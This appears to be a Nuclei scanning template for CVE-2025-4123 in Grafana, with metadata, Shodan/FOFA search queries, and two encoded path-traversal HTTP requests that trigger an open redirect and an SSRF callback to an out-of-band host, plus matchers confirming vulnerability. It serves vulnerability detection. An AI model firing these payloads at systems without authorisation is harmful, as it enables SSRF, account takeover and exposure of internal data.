CVE-2025-4123: Grafana - XSS / Open Redirect / SSRF via Client Path Traversal

id: CVE-2025-4123

info:
  name: Grafana - XSS / Open Redirect / SSRF via Client Path Traversal
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    An open redirect vulnerability in Grafana can be chained with other issues, such as XSS or SSRF, to increase impact. An attacker may exploit the redirect to target internal services or deliver malicious JavaScript, potentially leading to internal data exposure or account takeover.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L
    cvss-score: 7.6
    cve-id: CVE-2025-4123
    cwe-id: CWE-79,CWE-601
    epss-score: 0.05163
    epss-percentile: 0.895
  reference:
    - https://medium.com/@Nightbloodz/grafana-cve-2025-4123-full-read-ssrf-account-takeover-d12abd13cd53
    - https://grafana.com/blog/2025/05/21/grafana-security-release-high-severity-security-fix-for-cve-2025-4123/
  metadata:
    verified: true
    max-request: 1
    shodan-query: product:"Grafana"
    fofa-query: app="Grafana"
  tags: cve,cve2025,grafana,redirect,unauth,oss,vkev

http:
  - raw:
      - |
        GET /render/public/..%252f%255C{{interactsh-url}}%252f%253F%252f..%252f.. HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /public/..%2F%5coast.pro%2F%3f%2F..%2F.. HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        name: open-redirect
        dsl:
          - status_code == 302 && contains(location, '/\\oast.pro/?/../../')

      - type: dsl
        name: ssrf
        dsl:
          - contains(interactsh_protocol, 'dns') && contains(content_type, 'image/png')
# digest: 4a0a00473045022100e033c86126829576b7017256f67f61a245176c68a27d65852c325b6e1027c14d0220501a8d61a51c26639817cf1c1bb7fb2edc243534e8baaf86e3c9fb04b3f6d3e1:922c64590222798bb761d5b6d8e72950